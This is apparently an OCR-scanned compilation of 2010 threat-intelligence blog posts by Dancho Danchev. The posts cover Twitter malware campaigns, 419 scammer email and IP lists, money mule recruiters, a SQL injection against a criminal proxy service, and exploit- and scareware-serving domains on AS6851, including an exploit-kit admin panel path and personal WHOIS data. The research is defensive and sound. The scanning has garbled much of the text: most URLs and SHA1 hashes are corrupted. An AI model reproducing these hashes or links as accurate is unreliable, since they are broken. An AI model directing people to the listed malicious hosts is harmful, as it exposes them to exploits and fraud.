SHA 1 : b92dl268d06c8ba42 7beef cl ee 7b064873694a4 7 

SHA1: 5ba7ba0dc08a3d0cd3feb363394d295637a64el0 

SHA 1 : 7ecb2679cd23e6c6973c57092blcae46f60db97e 

SHA1: 66ed858043d6d022823bl 6956f416e3080e618a 1 

SHA 1 : Ofddlde26d5902d4a21 b053a212a21 c2 760d8aee 

SHA1: 5ba7ba0dc08a3d0cd3feb363394d295637a64el0 

SHA 1 : 3a7daa60389f463df795b78fl6030dcc6fcl ff23 

SHA1 : 3054b48186f5e0981 c41 f200b3492caa0941 f889 

SHA 1 : 0e49c7656becled43efbl9187541 d20c3ecb293b 

This isn't the first time Twitter's been abused for malicious 
purposes, and is definitely not the last. Quick community 
response and take down actions hit them where it hurts most 
- the monetization vector. 

Related assessments of Twitter malware campaigns: 

[16]Twitter Malware Campaign Wants to Bank With You 




[17] Dissecting Koobface Worm's Twitter Campaign 

[18] From Ukraine with Sea re ware Serving Tweets, Bogus 
Linked I n/Scribd Accounts, and Biackhat SEO Farms 

[19] From Ukraine with Bogus Twitter, Linked!n and Seribd 
Accounts 

[20] Twitter Worm Mikeyy Keywords Hijacked to Serve 
Sea re ware 

[21] Dissecting September's Twitter Sea reware Campaign 

This post has been reproduced from [22]Dancho 
Danchev's blog. Follow him [23Jon Twitter. 

1. htto://sunbeltbloa.blo as not.com/2010/06/odf-exoloit- 
s pamrun-on-twitter. html 
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2. htto.V/www.zdnet.com/bloa/securitv/10-thin as- vou-didnt- 
know-about-the-koobface-aana/5452? o a=2&taa=mantle 

skin;content 

3. http://ddanchev.blo as pot.com/2010/02/how-koobface- 
aana-monetizes-mac-os-x.html 

4. htto://ddanchev.blo as oot.com/2009/11/keeoina-mone v- 
mule-recruiters-on-short.htm / 

5. htto://ddanchev.blo as oot.com/2010/05/dissectina-mass- 
dreamhost-sites.html 

6 . 

http://ddanchev. blo as pot. com/2010/03/aaztransitstro v aaztra 
nzitstro v-from. html 



































7 . 

htto.Y/scanner.novirusthanks. ora/analvsis/2566clla9cd2226 
b59d226e 76bae9f64/ZTEuZGF0/ 

8 . 

http://scanner. no virusthanks. oro/analvsis/8daaa96ba059e6b 
1 d5108c 314fl60175/ZTIuZGFO/ 

9. 

htto://scanner. no virusthanks. ora/analvsis/7b2534536cdfl 68f 
50d63845bl3af8ba/dXBkMS5kYXO =/ 

10 . 

htto://scanner. no virusthanks. ora/analvsis/323ala2429467b3 
891 cc20a26b82f851/dXBkMi5kYXO =/ 

11 . 

http://scanner. no virusthanks. ora/analvsis/d05d89bdadd8a23 
c2ceb0b016d49550a/dXBkNi5kYXO =/ 

12 . 

htto://scanner. no virusthanks. ora/a rial vsis/1 a582b50d82fb5 7 b 
ec036el 962e5da2e/dXBkNv5kYXO =/ 

13. htto://ddanchev.blo as oot. com/2009/1O/standardizin a- 
monev-mule-recruitment.html 

14. htto://ddanchev.blo as oot.com/2009/11/keeoina-mone v- 
mule-recruiters-on-short.html 

15. htto://ddanchev.blo as oot. com/2009/11/koobface-botnet- 
starts-servino-client. html 

16. htto://ddanchev.blo as oot. com/2008/08/twitter-malware- 
campaian-wants-to-bank.html 


17. http://ddanchev.blo as pot. com/2009/07/dissectin a- 
koobface-worms-twitter. html 














































18. htto.V/ddanchev.blo as oot.com/2009/06/from-ukraine- 
with-sea re wa re-servin a. him! 


19. htto.V/ddanchev.blo as oot.com/2009/07/from-ukraine- 
with-boaus-twitter.html 

20. http://ddanchev.blo as pot.com/2009/04/twitter-worm- 
mike v v-kevwords-hi jacked. html 

21. http://ddanchev.blo as pot.com/2009/09/dissectin a- 
se otembers-twitter-scare ware, html 

22. htto://ddanchev.blo as oot.com/ 

23. htto://twitter.com/danchodanchev 
526 


£ 


Sampling 419 Advance Fee Scams Activity (2010-06- 
17 16:25) 

Lottery Winning Notifications, Western Union payment 
notifications, dead relatives, advance fee schemes imper¬ 
sonating law enforcement agencies - their arsenal of themes 
is endless, their IPs, however, aren't, taking into 

consideration the fact that the majority of 419 scams are not 
sent using botnets, but manually, and in a targeted fashion. 

In fact, some of their spamming techniques ([1J419 

scammers using Dilbert.com; [2J419 scammers using 
NYTimes.com 'email this feature') are so primitive 
compared to the financial impact, a successful advance fee 
has in the long term, that their KISS (Keep it Simple Stupid) 
mentality reflects the current situation within the cybercrime 






















ecosystem - they all KISS it to a certain extend - "[3]Report: 
Malicious PDF files comprised 80 percent of all 
exploits for 2009"; "[4]Re ports: SQL injection attacks 
and malware led to most data breaches". 

For the purpose of an experiment, and related reasons. 
Here's a raw snapshot of some 419-ers that just kept 

popping up, over and over again. 

Persistent 419 advance fee scammers (over the last 7 
days), the originating IPs, and the "reply to" email: 

- a _chenchen@yahoo.cn - 218.17.239.18 

- abduikadera _maroofomar@hotmaii.com - 41.138.180.86 

- alfredmorris.m@btinternet.com - 211.101.13.230 

- atmdept_serv001@yahoo.cn - 193.252.22.152 

- austinalan@wanadoo.co.uk - 193.252.22.190 

- avocat_doukoure@yahoo.fr - 78.229.212.4 

- barpaulaffum@live.com - 41.210.31.214 

- barr.rolandkenl@gmail.com - 221.235.112.210 

- barristerhenryivanlooconsult02@yahoo.co.jp - 

60.48.104.88 

- barteddywili01@googlemail.com - 200.13.249.119 

- cocacoiaofficiaiprizel9@yahoo.com.hk - 194.79.134.37 

- courfed@aim.com - 79.123.210.10 
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- crichardchambers@rediff.com - 212.242.42.50 

- curiehenria@yahoo.com, barr09amorisql@gmail.com - 

123.176.96.137 

- dr.austenobigwe008@gmaii.com - 41.211.228.112 

- drabejohn2009@aol.com - 217.72.192.242 

- duncan.macdonald@9.cn, barr_duncan 
_macdonaid@yahoo.co.uk - 86.43.60.104 

- ecowascounsellordept@gmail.com -115.242.97.173 

- efccantigraft.nigeria077@gmail.com - 24.166.97.40 

- Email.jmwilliams66@gmail.com, misteredwin22@gmail.com 

- 89.144.96.52 

- fedex. courerservicesl @hotmail. com, 
richardjohson@live.com - 87.194.255.145 

- fedpeters07@aim.com -81.31.115.2 

- henryanthonyioanfirm@gmaii.com - 200.40.197.69, 
41.219.152.78 

- icpcmistrynig@yahoo.com, fedeministrynig@gmail.com - 

91.198.227.49 

- janefugar2.u@hotmail.com - 82.196.5.120 

- jimovia8787@gmail.com - 216.222.201.201 

- John _chan3030@yahoo.com. hk - 200.171.215.2 

- Ioannationwide2010@windowslive.com - 222.124.26.155 

- mailesq.charlesstanley@gmail.com -163.20.186.1 



- maroofomar_abdulkader@yahoo.com - 62.193.229.238 

- martha _ikobopayment@yahoo.com.hk - 41.138.172.81 

- microwin2010@hotmaU.co.uk - 200.105.120.151 

- ministerdeiiveryofficer@yahoo.cn - 193.252.22.190 

- miss.kajat@googlemail.com -67.15.16.31 

- missbiessing@sify.com - 196.28.250.53 

- mr.parady700@hotmail.com - 80.200.242.17 

- mrabdulhaleem@gmail.com - 66.11.225.183 

- MRANNOLDSMITH2010@gmail.com - 82.128.17.211 

- mrderekpaulatm405@gmail.com - 86.209.83.68 

- Mrperentochaplain@rocketmail. com; 
Mrperentochalion@gmail.com - 112.110.186.25 

- mrsabueke@cantv.net - 200.11.173.131 

- nicemel970@yahoo.com - 80.12.242.27 

- ntai Jerry7775@yahoo.com.hk - 125.141.17.158 

- ochuko_babal@hotmail.fr - 65.55.111.159 

- ochukobabal@gmail.com - 65.55.111.85 

- officereplybackmaill@yahoo.com - 82.128.17.211 

- organlotoint39l@yahoo.com. hk - 207.194.87.105 

- promoskllotto@rocketmail.com - 90.183.38.130 



- realexchanges@aim.com - 212.225.181.101 

- rev.sistermaryx31@gmail.com - 41.211.228.112 

- robinkelleyl967@hotmail.com - 85.214.37.73 

- rpatmcard@hotmail.com -195.83.9.36 

-s.leel@yahoo.com, westernunionoffice99@gmaii.com - 

41.191.85.45 

- shopperconsultant@live.co.uk -195.137.70.240 

- talkdelata3@gmail.com, mdelataecobank@gala.net - 

116.255.152.124 

- thefordfoundation. a ward 001 O@yahoo. co. uk - 

222.124.9.54 

- ubanigeria.nig65@gmail.com - 202.132.123.106 

- vex.pressd2009@gmail.com - 66.48.81.131 

- waziriefccng@live.com -193.252.22.191 

- worldbpr@9.cn - 41.204.224.19 

- www.cn_western_union@w.cn - 41.222.192.82 

- zakiawiiol01@yahoo.co.uk - 202.132.123.106 
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-zongo.benl77@gmail.com, mr_hiiu60@msn.com - 

212.52.146.118 

- bog_officemaii@yahoo.co.jp - 82.128.2.78 

- atmfinanceibc@web2maii.com - 41.218.237.202 



- mrjohnsmith70@hotmail.com - 213.171.218.33 

- junhuan9@yahoo.cn - 218.91.39.165 

Nothing hurts as much as a decent historical OSINT 
regarding the activities of any cybercriminal. Moreover, 

this historical OSINT not only contributes to a more efficient 
case building, but also, helps to establish some pretty 
interesting connections within the cybercrime ecosystem. As 
practice and experience has shown, this very same 

ecosystem is not necessarily as big as originally assumed. 

Consider going through the related fraudulent 
schemes/malicious campaigns currently taking advantage of 

FIFA's World Cup - [5]Protection tips for the upcoming 
FIFA World Cup themed cybercrime campaigns. 

This post has been reproduced from [6]Dane ho 
Danchev's blog. Follow him [7]on Twitter. 

1. htto://www.zdnet.com/bloa/securitv/419-scammers-usin a- 
dilbertcom/3809 

2. htto://www.zdnet.com/bloa/securitv/419-scammers-usin a- 
n vtimescom-email-this-feature/3491 

3. http://www.zdnet.com/blo c i/securitv/reDort-malicious-Ddf- 
files-comprised-80-percent-of-all-exploits-for-20 

09/5473 

4. http://www.zdnet.com/bloa/securitv/reports-sql-iniection- 
attacks-and-malware-led-to-most-data-breaches/54 
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5. htto ://www.zdnet. com/bloa/securit v/ pro tection- tips-for- the - 
u ocomina-fifa-world-cuD-themed-cvbercrime-cam o 

a i ans/6610 

6. htto.V/ddanchev.blo as oot.com/ 

7. htto://twitter.com/danchodanchev 
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Money Mule Recruiters Trick Mules Into Installing Fake 
Transaction Certificates (2010-06-29 11:07) What is 
more flattering than Ukrainian blackhat SEO gangs using 
name as redirectors, including offensive messages, the 
Koobface gang redirecting Facebook's IP space to your blog, 
or a plain simple danchodanchev admin panel within a Crime 
Pack kit? 

It's the money mule recruiters who modify the HOSTS file of 
gullible mules to redirect ddanchev.blogspot.com and 
bobbear.co.uk to 127.0.0.1. Now that's flattering, 
considering the fact that my public money mule ecosystem 
related research represents a tiny percentage of the real 
profiling/activities taking place behind the curtains. 

a 

Related coverage of money laundering/recruitment in 
the context of cybercrime: 

[ 1 ]Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[2]Money Mute Recruitment Campaign Serving Client-Side 
Exploits 














[3] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[4] Money Mule Recruiters on Yahoo! 's Web Hosting 

[5] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[7] Keeping Reshipping Mule Recruiters on a Short Leash 

[8] Keeping Money Mule Recruiters on a Short Leash 

[9] Standardizing the Money Mule Recruitment Process 

[10] lnside a Money Laundering Group's Spamming 
Operations 

[HJMoney Mule Recruiters use ASProx's Fast Fluxing 
Services 

[12]Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [13]Dancho 
Danchev's blog. Follow him [14]on Twitter. 

1. htto://ddanchev.bio as oot.com/2010/04/keeDina-mone v- 
mule-recruiters-on-short.html 

2. htto://ddanchev.bio as oot.com/2010/03/monev-mule- 
recruitment-camDaian-servina.html 

3. htto://ddanchev.bio as oot.com/2010/03/keeDina-mone v- 
mule-recruiters-on-short. html 
















4. http://ddanchev.blo as oot.com/2010/03/monev-mule- 
recruiters-on-vahoos-web.html 

5. htto.V/ddanchev.blo as oot.com/2010/02/dissectin a- 
on aoina-monev-mule.html 

6. http://ddanchev.blo as oot.com/2010/02/keeoina-mone v- 
mule-recruiters-on-short. html 

7. http.V/ddanchev.blo as pot.com/2009/12/keepin a- 
reshi D oina-mule-recruiters-on.html 

8. htto.V/ddanchev.blo as oot.com/2009/ll/keeoina-mone v- 
mule-recruiters-on-short.html 

9. htto.V/ddanchev.blo as oot.com/2009/10/standardizin a- 
monev-mule-recruitment.html 

10. htto.V/ddanchev.blo as oot.com/2009/05/inside-mone v- 
launderin a- arouD5-soammina.html 

11. htto.V/ddanchev.blo as oot.com/2008/07/monev-mule- 
recruiters-use-asDroxs-fast.html 

12. htto.V/ddanchev.blo as oot.com/2008/10/monev-mules- 
s vndicate-activelv.html 

13. htto.V/ddanchev.blo as oot. com/ 

14. htto://twitter.com/danchodanchev 
530 


1.7 

July 


531 
















































ZDNet 


A k Hop tfiim Dmltili White Papers 


lag to l Aw ; SM MwMw W 


Compi-ew Kinhw* Softmn MoUf Security lUwird SpraalCov<n|f 



Zero Day 


Googler releases Windows zero-day exploit. Microsoft unimpressed 

The sv4n«rab*t>. wtech n due to wrproper untiMbon of tKp:// URIf may aiow a remote, 
inauthenbcated attacker to execute arbitrary commands. 


Adobe plugs security holes in PDF Reader. 
Acrobat 


Adobe today shaped * entical Reader,'Acrobat patch to cover a total o t 
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users to maboous hacker attacks. 

Defenders of the faith (Taxis acted responsibly) 

Lurene Greener. Tam Ormandy has protected fegh-vakse targets by 
retusmg to a*ow M*rosoft an unreasonable t e n e kne for patchng 

Researchers find is zero day flaws, targeting 5 
web malware exploitation kits 

SecvrRv researchers from TTKTRl-Seovntv. have found 12 rero dav Raws 
tarptexv) 5 of the most common web maiware eipfctfabon kits such as 
Neon. Etconore. Liberty. Lucky and the Tt*. 

From prediction to prophecy: The soio threat 
landscape 

In Jjnuery 2010. Fortrwt issued a report outirang our predKhont for 
The Top 10 Seorfy Trends for 2010. Now that we're iredway through 
the vear. IVe decided to look back at those 
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Summarizing Zero Day's Posts for June (2010-07-05 
21:35) 


The following is a brief summary of all of my posts at 

[lJZDNet's Zero Day for June, 2010. You [2Jean also go 

through 

[3] previous summaries, as well as subscribe to my 

[4] personai RSS feed, [5]Zero Day's main feed, or 

follow me on Twitter: 


Recommended reading 






• [6]The security and privacy ramifications of AT&T's iLeak 

• [7]The EFF releases new HTTPS Everywhere Fire fox 
extension 

• [8]Researchers find 12 zero day flaws, targeting 5 web 
malware exploitation kits 

01. [9]Malware Watch: Free Mac OS X screensavers bundled 
with spyware 

02. [lOJProtection tips for the upcoming FIFA World Cup 
themed cybercrime campaigns 

03. [HJMalware Watch: Twitter password reset emails, IRS- 
themed crimeware, malicious PDFs, and fake YouTube 532 

pages 

04. [12]The security and privacy ramifications of AT&T's 
iLeak 

05. [13]Malware Watch: Adobe zero day attack, malicious 
FIFA-themed spam, exploit serving Virus Alerts 

06. [14]Malware Watch: Skype exploit, Skype-themed 
malicious spam campaigns detected 

07. [15]The EFF releases new HTTPS Everywhere Fire fox 
extension 

08. [16]Researchers find 12 zero day flaws, targeting 5 web 
malware exploitation kits 

This post has been reproduced from [17]Dancho 
Danchev's blog. Follow him [18]on Twitter. 

1. httD://bloas.zdnet. com/securit v 




2. http://ddanchev.blo as oot.com/2010/05/summarizina-zero- 
da vs- oosts-for-ma v.html 
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o=l&mode=rss&ta a =mantle_skin . -content 
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9. htto://www.zdnet.com/bloa/securitv/malware-watch-free- 
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10. htto://www.zdnet. com/bloa/securit v/ orotection-tios-for- 
the-UDComina-fifa-world-cuD-themed-cvbercnme-cam o 

a i ans/6610 

11. htto://www.zdnet.com/bloa/securitv/malware-watch- 
twitter-oassword-reset-emails-irs-themed-crimeware-malic 

ious-Ddfs-and-fake-voutube- oa aes/6636 

12. htto://www.zdnet. com/bloa/securitv/the-securitv-and- 
pri va c v-ramifica tions-of-a t- ts-ileak/6649 
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Cybercriminals SQL Inject Cybercrime-friendly Proxies 
Service (2010-07-13 23:00) 

Cybercrime ecosystem irony , at its best. Why the irony? 
Because the cybercrime-friendly proxies service TOS 

explicitly states that its users cannot launch XSS/SQL 
injection attacks through it. 

A relatively low profile cybercriminal has managed to exploit 
a remote SQL injection within a popular proxies 





































service, offering access to compromised hosts across the 
globe for any kind of malicious activities. Based on the video 
released, he was able to access everyone's password as MD5 
hash, next to the emulating of the users of the 

service, using a trivial flaw in the online.cgi script. 

Although his intentions, based on the note left in a 
readme.txt file featured in the video, was to allow others to 
use the paid service freely, the potential for undermining the 
OPSEC of cybercriminals using the service is 

enormous, as it not only logs their financial transactions, 
keeps records of their IPs, but most interestingly, allows the 
"manual feeding" of proxy lists (compromised and freely 
accessible hosts) within the database. 
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The service itself, has been in operation since 2004, 
operating under different brands, with prices starting from 
$20 to $90 for access to 150, and 1500 hosts on a monthly 
basis. Some interesting facts from a threat intell/social 
network analysis perspective, including screenshots ( on 
purposely blurred in order to prevent the ruining of 
important OSINT 

sources) of the service obtained from its help file. 

• The gang/hacking/script kiddies team operates different 
business operations online 

• They maintain a traffic purchasing program monetizing 
traffic through [ 1 Jcybercrime-friendly search engines 


• Whether they are lazy, or just don't care, 4 currently active 
adult web sites share the same infrastructure as the service 
itself 

• Although the original owners are Russian, they appear to 
be franchising since once of their brands is offering 

their services in Indonesian, including a banner for what 
looks like a Indonesian security conference. 

• One of the Indonesian franchisers is known to have been 
offering root accounts and shells at compromised 

servers for sale, back in 2007 
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For years, compromised malware hosts has been widely 
abused for anything, from direct spamming, to hosting 

spam/phishing and malware campaigns, but most 
importantly - to engineer cyber warfare tensions by directly 

forwarding the responsibility for the malicious actions of the 
cybercriminal/cyber spy to the host/network/country in 
question. 

Not only do these tactics undermine the currently 
implemented data retention regulations - how can you 


data retain something from a compromised ecosystem that 
keeps no logs - but also, they offer a safe heaven for the 
execution of each and every cybercriminal practice there is. 

Related posts: 

[2] Should a targeted country strike back at the cyber 
attackers? 

[3] Malware Infected Hosts as Stepping Stones 

[4] The Cost of Anonymizing a Cybercriminal's Internet 
Activities 
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[5] The Cost of Anonymizing a Cybercriminal's Internet 
Activities - Part Two 

This post has been reproduced from [6]Dane ho 
Danchev's blog. Follow him [7]on Twitter. 

1. httD://www.zdnet.com/bloa/securit v/c vbercriminals- 
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anon vmizin g-c vbercriminals. html 
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Exploits, Malware, and Scareware Courtesy of 
AS6851, BKCNET, Sagade Ltd. (2010-07-14 19:54) 

Never trust an AS whose abuse-mailbox is using a Gmail 
account (piotrek89@gmail.com), and in particular one that 
you've come across to during several malware campaigns 
over the past couple of month. It's [1JAS6851, BKCNET 

"SIA" IZZI I'm referring to, also known as Sagade Ltd. 

Let's dissect the currently ongoing malicious activity at that 
Latvian based AS, expose the ex- 

ploit/malware/crimeware/sca re ware serving domain 
portfolios, sample some of the currently active binaries 

and emphasize on the hijacking of Google/Yahoo and Bing 
search engines, as well as take a brief retrospective of 

AS6851 's activities profiled over the past couple of months. 

What's so special about AS6851 anyway? It's the numerous 
times in which the AS popped-up in previously 

profiled campaigns (see related posts at the bottom of 

the post), next to a pretty interesting Koobface gang 
connection. [2] An excerpt from a previous post: 

" What's so special about [3JAS6851, BKCNET "SIA " IZZI 
anyway? It's the Koobface gang connection in the face of 

uro- 



dinam.net, which is also hosted within A56851, currently 
responding to 91.188.59.10. More details on 

urodinam.net: 

• [4]Koobface Botnet's Scareware Business Model 

540 

• [5]Koobface Botnet's Scareware Business Model - 
Part Two 

Moreover, on the exact same IP where Koobface gang's 
urodinam.net is parked, we also have the currently active 

Izabsiwvn538n4i5tcji.com - Email: 

michaeitycoon@gmaii.com, serving client side exploits using 
the Yes Malware Exploitation kit - 91.188.59.10 
/temp/cache/PDF.php; admin panel at: 

Izabslwvn538n4i5tcjl. com 

/temp/admin/index.php 

The same michaeltycoon@gmail.com used to register 
Izabsiwvn538n4i5tcji.com, was also profiled in the 

"[6]Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 11 

assessment. " 

Related data on AS6851, BKCNET/Sagade Ltd.: 

netname: ATECH-SAGADE 

descr: Sagade Ltd. 

descr: Latvia, Rezekne, Darzu 21 


descr: +371 20034981 



remarks: abuse-mailbox: piotrek89@gmail.com 

country: LV 

admin-c: JS1449-RIPE 

tech-c: JS1449-RIPE 

status: ASSIGNED PA 

mnt-by: AS6851-MNT 

source: RIPE # Filtered 

person: Juris Sahurovs 

remarks: Sagade Ltd. 

address: Latvia, Rezekne, Darzu 21 

phone: +371 20034981 

abuse-mailbox: piotrek89@gmail. com 

nic-hdl: JS1449-RIPE 

mnt-by: ATECH-MNT 

source: RIPE # Filtered 

AS6851 advertises 15 prefixes: 

*62.84.0.0/19 

62.84.22.0/23 

84.38.128.0/20 


85.234.160.0/19 



91.123.64.0/20 


91.188.32.0/19 

91.188.41.0/24 

91.188.44.0/23 

91.188.46.0/24 

91.188.48.0/23 

91.188.50.0/24 

91.188.52.0/23 

91.188.56.0/24 

109.110.0.0/19 

195.244.128.0/20 

Uplink courtesy of: 

AS674 7, LATTELEKOM Lattelekom 
541 

AS 5 518, TELIALATVIJA Telia Latvija SI A 

Currently active exploits/malware/scareware serving domain 
portfolios within AS6851: 

Parked at/responding to 85.234.190.15 are: 

anrio.in - Email: Ometovgordey@maii.com 

brayx.in - Email: NikitasZoya@mail.com 



broyx.in - Email: NikitasZoya@mail.com 
brusd.in - Email: LomaevaTatyana@maii.com 
butuo.in - Email: erofeevalexey77@gmail.com 
butyx.in - Email: NikitasZoya@maii.com 
cogoo.in - Email: 5amatovNail@mail.com 
conyx.in - Email: NikitasZoya@mail.com 
eboyx.in - Email: NikitasZoya@mail.com 
ederm.in - Email: Evenkolvan@mail.com 
edois.in - Email: Evenkolvan@mail.com 
foryx, in - Email: NikitasZoya@mail.com 
liuyx.in - Email: NikitasZoya@mail.com 
moosd.in - Email: Vasileva5vetlana@mail.com 
oserr.in - Email: skripnikkseniya@live.com 
ossce.in - Email: skripnikkseniya@live.com 
ostom.in - Email: skripnikkseniya@live.com 
purnv.in - Email: BajenovOleg@mail.com 
ragew.in - Email: vednerovasvetlana@gmail.com 
relsd.in - Email: Vasileva5vetlana@mail.com 
retnv.in - Email: BajenovOleg@mail.com 
sdali.in - Email: VasilevaSvetlana@mail.com 



seedw.in - Email: vednerovasvetlana@gmail.com 
shkey.in - Email: FiruievAndrey@maii.com 
spkey.in - Email: FirulevAndrey@mail.com 
thynv.in - Email: BajenovOleg@mail.com 
uitem.in - Email: lvanovEvgeny@mail.com 
wakey.in - Email: FirulevAndrey@mail.com 
yxial.in - Email: GaevAlexandr@mail.com 
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Parked at/responding to 85.234.190.4 are: 
anrio.in - Email: Ometovgordey@mail.com 
antsd.in - Email: lvanovEvgeny@mail.com 
appsd.in - Email: lvanovEvgeny@mail.com 
arsdh.in - Email: shadrenkovavanda@mail.com 
barui.in - Email: RijovAlexandr@mail.com 
bkpuo.in - Email: erofeevalexey77@gmail.com 
bleui.in - Email: RijovAlexandr@mail.com 
brayx.in - Email: NikitasZoya@maii.com 
broyx.in - Email: NikitasZoya@mail.com 
brusd.in - Email: LomaevaTatyana@mail.com 


bryhw.in - Email: matatovayanna@mail.com 
butui.in - Email: RijovAlexandr@mail.com 
butuo.in - Email: erofeevalexey77@gmail.com 
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butyx.in - Email: NikitasZoya@mail.com 
cirui.in - Email: RijovAlexandr@mail.com 
cogoo.in - Email: RijovAlexandr@mail.com 
conuo.in - Email: erofeevalexey77@gmail.com 
conyx.in - Email: NikitasZoya@mail.com 
cusnv.in - Email: 5imakov5ergey@mail.com 
czkey.in - Email: ZaharcevSergey@mail.com 
degoo.in - Email: SamatovNail@mail.com 
dugoo.in - Email: SamatovNail@mail.com 
ecrio.in - Email: Ometovgordey@mail.com 
ectuo.in - Email: erofeevalexey77@gmail.com 
ederm.in - Email: Evenkolvan@mail.com 
edger.in - Email: Evenkolvan@mail.com 
edimp.in - Email: Evenkolvan@mail.com 
edois.in - Email: Evenkolvan@mail.com 
elrio.in - Email: Ometovgordey@mail.com 



enguo.in - Email: erofeevalexey77@gmail.com 
eqrio.in - Email: Ometovgordey@maii.com 
fibnv.in - Email: 5imakov5ergey@maii.com 
glouo.in - Email: erofeevalexey77@gmail.com 
habsd.in - Email: LomaevaTatyana@maii.com 
hecuo.in - Email: erofeevalexey77@gmail.com 
he key. in - Email: ZaharcevSergey@mail.com 
hygos.in - Email: Hohlunovanika@live.com 
imbos.in - Email: Hohlunovanika@live.com 
intsd.in - Email: LomaevaTatyana@mail.com 
ionnv.in - Email: 5imakov5ergey@mail.com 
jamsd.in - Email: LomaevaTatyana@mail.com 
latuo.in - Email: erofeevalexey77@gmail.com 
linuo.in - Email: erofeevalexey77@gmail.com 
m a key. in - Email: ZaharcevSergey@mail.com 
oscog.in - Email: Nigmatovaanastasia@hotmail.com 
oserr.in - Email: skripnikkseniya@live.com 
osmac.in - Email: skripnikkseniya@live.com 
osmot.in - Email: skripnikkseniya@live.com 
ospor.in - Email: skripnikkseniya@live.com 



ossce.in - Email: skripnikkseniya@live. com 
ossio.in - Email: skripnikkseniya@iive.com 
ostab.in - Email: skripnikkseniya@live.com 
ostac.in - Email: skripnikkseniya@live.com 
ostio.in - Email: skripnikkseniya@live.com 
ouned.in - Email: PoieschukovaGaiina@maU.com 
purnv.in - Email: BajenovOleg@mail.com 
pxdmx.in - Email: GaleevDjamil@mail.com 
re key. in - Email: ZaharcevSergey@mail.com 
relsd.in - Email: VasilevaSvetlana@mail.com 
retnv.in - Email: BajenovOleg@mail.com 
scoos.in - Email: Nigmatovaanastasia@hotmail.com 
sdali.in - Email: VasilevaSvetlana@mail.com 
sdome.in - Email: OsvyanikovaDarya@mail.com 
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shkey.in - Email: FirulevAndrey@mail.com 
spkey.in - Email: FirulevAndrey@mail.com 
sydos.in - Email: Nigmatovaanastasia@hotmail.com 
thynv.in - Email: BajenovOleg@mail.com 
ugiyx.in - Email: UshakovAndrey@mail.com 



uirin.in - Email: UshakovAndrey@mail.com 
uisap.in - Email: UshakovAndrey@maii.com 
uitem.in - Email: lvanovEvgeny@mail.com 
u it hi. in - Email: lvanovEvgeny@mail.com 
uityp.in - Email: lvanovEvgeny@mail.com 
uityr.in - Email: lvanovEvgeny@mail.com 
varyx.in - Email: GaevAlexandr@mail.com 
wakey.in - Email: FirulevAndrey@mail.com 
yokey.in - Email: FirulevAndrey@mail.com 
yxiac.in - Email: GaevAlexandr@mail.com 
yxial.in - Email: GaevAlexandr@mail.com 
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Parked at/responding to 91.188.60.225 are: 
abrie.in - Email: Bodunovanton@mail.com 
agros.in - Email: Fiohiunovanika@iive.com 
a I Idh. in - Email: bondyashovandrey@mail.com 
alodh.in - Email: radostovamariya@mail.com 
anrio.in - Email: Ometovgordey@mail.com 
antsd.in - Email: lvanovEvgeny@mail.com 


aoxtv.in - Email: AkulovSergey@mail.com 
appsd.in - Email: lvanovEvgeny@mail.com 
aquui.in - Email: RijovAlexandr@mail.com 
arrie.in - Email: Bodunovanton@maii.com 
arsdh.in - Email: shadrenkovavanda@mail.com 
balsd.in - Email: lvanovEvgeny@mail.com 
barui.in - Email: RijovAlexandr@mail.com 
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bikey.in - Email: ZaharcevSergey@mail.com 
bkpuo.in - Email: erofeevalexey77@gmail.com 
bleui.in - Email: RijovAlexandr@mail.com 
brayx.in - Email: NikitasZoya@maii.com 
broyx.in - Email: NikitasZoya@mail.com 
brusd.in - Email: LomaevaTatyana@maii.com 
bryhw.in - Email: matatovayanna@mail.com 
butui.in - Email: RijovAlexandr@mail.com 
butuo.in - Email: erofeevalexey77@gmail.com 
butyx.in - Email: NikitasZoya@mail.com 
cated.in - Email: PoieschukovaGaiina@maU.com 
cedhw.in - Email: lopushkoamariya@mail.com 



chrie.in - Email: Bodunovanton@mail.com 
chrio.in - Email: Ometovgordey@maii.com 
cirui.in - Email: RijovAlexandr@mail.com 
clrio.in - Email: Ometovgordey@mail.com 
cogoo.in - Email: 5amatovNail@mail.com 
conuo.in - Email: erofeevalexey77@gmail.com 
conyx.in - Email: NikitasZoya@mail.com 
corie.in - Email: Bodunovanton@mail.com 
curie.in - Email: Bodunovanton@mail.com 
cusnv.in - Email: 5imakov5ergey@mail.com 
czkey.in - Email: ZaharcevSergey@mail.com 
degoo.in - Email: SamatovNail@mail.com 
dennv.in - Email: 5imakov5ergey@mail.com 
dugoo.in - Email: SamatovNail@mail.com 
eagoo.in - Email: 5amatovNail@mail.com 
eboyx.in - Email: NikitasZoya@mail.com 
ecrio.in - Email: Ometovgordey@maU.co 
ectuo.in - Email: erofeevalexey77@gmail.com 
edbal.in - Email: VasilevOleg@mail.com 
edban.in - Email: VasilevOleg@mail.com 



ederc.in - Email: Evenkolvan@mail.com 
ederm.in - Email: Evenkolvan@mail.com 
edger.in - Email: Evenkolvan@mail.com 
edimp.in - Email: Evenkolvan@mail.com 
edois.in - Email: Evenkolvan@mail.com 
elrio.in - Email: Ometovgordey@maii.com 
enguo.in - Email: erofeevalexey77@gmail.com 
eprio.in - Email: Ometovgordey@maii.com 
eqrio.in - Email: Ometovgordey@mail.com 
esrie.in - Email: Bodunovanton@mail.com 
fa key. in - Email: ZaharcevSergey@mail.com 
fegoo.in - Email: SamatovNail@mail.com 
fibnv.in - Email: SimakovSergey@mail.com 
foryx.in - Email: NikitasZoya@mail.com 
franv.in - Email: SimakovSergey@mail.com 
fraos.in - Email: Hohlunovanika@live.com 
garie.in - Email: Bodunovanton@mail.com 
glouo.in - Email: erofeevalexey77@gmail.com 
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guinv.in - Email: SimakovSergey@mail.com 



habsd.in - Email: LomaevaTatyana@mail.com 
hecuo.in - Email: erofeevalexey77@gmail.com 
he key. in - Email: Zaharcev5ergey@maii.com 
humos.in - Email: Hohlunovanika@live.com 
hygos.in - Email: Hohlunovanika@live.com 
hyrie.in - Email: Bodunovanton@mail.com 
imhos.in - Email: Hohlunovanika@live.com 
intsd.in - Email: LomaevaTatyana@mail.com 
ionnv.in - Email: SimakovSergey@mail.com 
jamsd.in - Email: LomaevaTatyana@mail.com 
jo bos. in - Email: Hohlunovanika@live.com 
kykey.in - Email: ZaharcevSergey@mail.com 
